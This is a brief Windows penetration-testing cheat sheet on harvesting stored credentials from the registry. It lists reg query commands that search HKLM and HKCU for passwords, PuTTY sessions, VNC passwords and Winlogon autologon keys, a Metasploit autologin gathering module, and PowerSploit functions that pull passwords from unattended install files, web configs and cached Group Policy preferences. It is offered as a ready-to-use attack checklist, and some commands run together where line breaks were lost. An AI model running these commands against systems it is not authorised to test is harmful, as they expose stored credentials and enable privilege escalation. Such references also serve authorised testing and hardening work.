Credentials in Registry
1) Cmd
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sreg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /t REG_SZ /sreg query "HKCU\Software\ORL\WinVNC3\Password"reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"2) Metasploit
post/windows/gather/credentials/windows_autologin3) Powersploit
Import-Module .\Privesc.psd1
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogonLast updated